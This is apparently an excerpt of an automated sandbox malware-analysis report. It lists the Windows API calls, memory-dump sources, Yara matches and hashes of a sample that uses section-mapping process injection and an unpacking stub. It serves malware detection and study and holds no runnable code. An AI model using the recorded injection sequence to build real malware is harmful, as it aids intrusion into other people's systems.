                                                • SetErrorMode.KERNELBASE(00000000,?,?,005B0223,?,?), ref: 005B0E1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2121025538.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5b0000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction ID: e6f0b986f79c47f2df78b5900a9022620743f9650b9358d5e1040a707868e860
                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction Fuzzy Hash: 0FD0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9080C770994046E5

                                                Control-flow Graph

                                                APIs
                                                • VirtualProtect.KERNELBASE(00000040,?), ref: 004179E2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120667352.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: cba572e7f36d69fd621d82a340d50add2c2981a162f38f0641d48c01d346696d
                                                • Instruction ID: 55a1a841f0e4b6d1ed6018a3982979d51180b0568af62e4b39049d3d9c283280
                                                • Opcode Fuzzy Hash: cba572e7f36d69fd621d82a340d50add2c2981a162f38f0641d48c01d346696d
                                                • Instruction Fuzzy Hash: 00C08C71240109BFCB11CB81ED02E963B6DEB00204F408070B301A21F0D2B1AD119B2C
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                                • Instruction ID: 41df8370e0b5f9a47a14a91e784646d83bdfa422f97ac69dcfec837627d5bcb0
                                                • Opcode Fuzzy Hash: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                                • Instruction Fuzzy Hash: 6D018CF520C148E7EB016A948DB1EBA36299B45324F300233B647B91F4C57C8A03E76F
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0084979F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2121442892.0000000000846000.00000040.00000020.00020000.00000000.sdmp, Offset: 00846000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_846000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                APIs
                                                • LocalAlloc.KERNELBASE(00000000,00417DE5), ref: 004179B5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120667352.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                Similarity
                                                • API ID: AllocLocal
                                                • String ID:
                                                • API String ID: 3494564517-0
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00417B7B
                                                • Sleep.KERNEL32(00000000), ref: 00417BAA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120667352.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterSleepUnhandled
                                                • String ID: -
                                                • API String ID: 2853467449-2547889144
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2121025538.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5b0000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .$GetProcAddress.$l
                                                • API String ID: 0-2784972518
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2121442892.0000000000846000.00000040.00000020.00020000.00000000.sdmp, Offset: 00846000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_846000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2121025538.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5b0000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00429FD0), ref: 00417AB6
                                                • GetProcAddress.KERNEL32(00000000,0041C258), ref: 00417AF3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120667352.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID:
                                                • API String ID: 1646373207-3916222277

                                                Execution Graph

                                                Execution Coverage:9%
                                                Dynamic/Decrypted Code Coverage:21.6%
                                                Signature Coverage:0%
                                                Total number of Nodes:134
                                                Total number of Limit Nodes:5

                                                Control-flow Graph

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectView
                                                • String ID:
                                                • API String ID: 1652636561-0

                                                Control-flow Graph

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0

                                                Control-flow Graph

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectView
                                                • String ID:
                                                • API String ID: 1652636561-0

                                                Control-flow Graph

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                                • Instruction ID: 1fc6fb52bb36dddf8f971a96ecfe927bdbae9887f6286775c14151e9c1d92244
                                                • Opcode Fuzzy Hash: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                                • Instruction Fuzzy Hash: 13512B71900245BBEB209F91CC88FAF7BB8EF85B00F14416AF912BA2E5D6749945CB64

                                                Control-flow Graph (figure omitted)
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                                • Instruction ID: d88667ffe02cbbb2798d41d5ad0cf6527765788d972b82ac88077c7d238bff09
                                                • Opcode Fuzzy Hash: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                                • Instruction Fuzzy Hash: 54511A71900205BFEF209F91CC89FAFBBB8FF85B10F104259F911AA2A5D7759941CB64

                                                Control-flow Graph (figure omitted)
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                                • Instruction ID: 7169477154cf1621f4f222e223ad54e678f31395e99d0ffd613e12cb64d905d3
                                                • Opcode Fuzzy Hash: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                                • Instruction Fuzzy Hash: 2B511A75900245BBEF209F91CC88FEF7BB8FF85B10F104119F911BA2A5D6759941CB64

                                                Control-flow Graph (figure omitted)
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                                • Instruction ID: 14f4b29c405daff92d21e2b3eea283823ae405efc36948ac0d92101f557811aa
                                                • Opcode Fuzzy Hash: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                                • Instruction Fuzzy Hash: DE51F9B5900245BBEF209F91CC88FEFBBB8FF85B10F104259F911AA2A5D6709944CB64

                                                Control-flow Graph (figure omitted; node 4030ce-40313d: RtlCreateUserThread, NtTerminateProcess)
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: CreateProcessTerminateThreadUser
                                                • String ID:
                                                • API String ID: 1921587553-0
                                                • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                • Instruction ID: 3e1675bac70c022a4e457ffe6b5fa54937b73e0116388ba90aec32851b4d9964
                                                • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                • Instruction Fuzzy Hash: A1412431228E088FD768EF5CA885762B7D5F798311F6643AAE809D7389EA34DC1183C5

                                                Control-flow Graph

                                                APIs
                                                • InterlockedDecrement.KERNEL32(?), ref: 00417CD8
                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 00417CEF
                                                • GetAtomNameW.KERNEL32(00000000,00000000,00000000), ref: 00417CF8
                                                • AreFileApisANSI.KERNEL32 ref: 00417CFE
                                                • SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 00417D06
                                                • EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 00417D0F
                                                • GetCommMask.KERNELBASE(00000000,00000000), ref: 00417D3F
                                                • GetLastError.KERNEL32 ref: 00417D45
                                                • ZombifyActCtx.KERNEL32(00000000), ref: 00417D58
                                                • GetConsoleAliasesW.KERNEL32(?,00000000,00000000), ref: 00417D67
                                                • OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00417D8C
                                                • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00417D95
                                                  • Part of subcall function 004179AD: LocalAlloc.KERNELBASE(00000000,00417DE5), ref: 004179B5
                                                • LoadLibraryA.KERNELBASE(004193D8), ref: 00417E38
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409153065.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_40b000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: ConsoleTimerWaitable$AliasesAllocApisAtomCommCreateDateDecrementEnumErrorFileFormatsInterlockedLastLibraryLoadLocalMaskMountNameOpenPointVolumeWriteZombify
                                                • String ID: tl_$}$
                                                • API String ID: 1277400812-2845185508
                                                • Opcode ID: 51d45e83e475c99cd7aa5bd50a4591079eb361b0ed041a489ec9c850fbcfa93b
                                                • Instruction ID: 05c418657806d1e3c5604e16026e84f417cc0deeb5e126f930ec35500030948a
                                                • Opcode Fuzzy Hash: 51d45e83e475c99cd7aa5bd50a4591079eb361b0ed041a489ec9c850fbcfa93b
                                                • Instruction Fuzzy Hash: 2F51C4705051289BC721AB21ED499DF3BB8EF09354B11847EF105E2161DB3C4DC6CBAD

                                                Control-flow Graph (figure omitted; nodes reference VirtualAlloc (5a004c-5a0263), VirtualProtect (5a02ce-5a03c2), VirtualFree (5a0439-5a04b8), LoadLibraryA (5a086e-5a08be))
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005A024D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409462213.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5a0000_ajjwvsd.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: cess$kernel32.dll
                                                • API String ID: 4275171209-1230238691
                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction ID: 339b6381adfffe255570805e1953e9d3465a61c11f423d1475d0b3c283b03e5d
                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction Fuzzy Hash: 3B526874A11229DFDB64CF58C984BACBBB1BF09304F1480D9E94DAB291DB30AE95DF14

                                                Control-flow Graph (figure omitted)
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0046A327
                                                • Module32First.KERNEL32(00000000,00000224), ref: 0046A347
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409361808.0000000000467000.00000040.00000020.00020000.00000000.sdmp, Offset: 00467000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_467000_ajjwvsd.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 3833638111-0
                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction ID: 2cc7809517e2dcc175924557c930e1ef9f622d7324e5d44df8fefa2c4b08ccf1
                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction Fuzzy Hash: F0F0FC321007106FD7203BF5988CB6F72ECAF49324F100129EA42E12C0E774EC454A57

                                                Control-flow Graph (figure omitted)
                                                APIs
                                                • SetErrorMode.KERNELBASE(00000400,?,?,005A0223,?,?), ref: 005A0E19
                                                • SetErrorMode.KERNELBASE(00000000,?,?,005A0223,?,?), ref: 005A0E1E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409462213.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5a0000_ajjwvsd.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction ID: ce7575169f36a7c85206fcae42e0fcb861aa2e687c756cbd9285e154151780ed
                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                • Instruction Fuzzy Hash: 18D0123114512877DB002A94DC09BCD7F1CDF09B62F008411FB0DD9080C770994046E5

                                                Control-flow Graph (figure omitted)
                                                APIs
                                                • VirtualProtect.KERNELBASE(00000040,?), ref: 004179E2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409153065.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_40b000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: cba572e7f36d69fd621d82a340d50add2c2981a162f38f0641d48c01d346696d
                                                • Instruction ID: 55a1a841f0e4b6d1ed6018a3982979d51180b0568af62e4b39049d3d9c283280
                                                • Opcode Fuzzy Hash: cba572e7f36d69fd621d82a340d50add2c2981a162f38f0641d48c01d346696d
                                                • Instruction Fuzzy Hash: 00C08C71240109BFCB11CB81ED02E963B6DEB00204F408070B301A21F0D2B1AD119B2C
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                                • Instruction ID: 41df8370e0b5f9a47a14a91e784646d83bdfa422f97ac69dcfec837627d5bcb0
                                                • Opcode Fuzzy Hash: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                                • Instruction Fuzzy Hash: 6D018CF520C148E7EB016A948DB1EBA36299B45324F300233B647B91F4C57C8A03E76F
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                                • Instruction ID: 34fc3aff5e218d4630d956a4f9c4c41b7245144a44faa4fd8074b33eba8f9d72
                                                • Opcode Fuzzy Hash: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
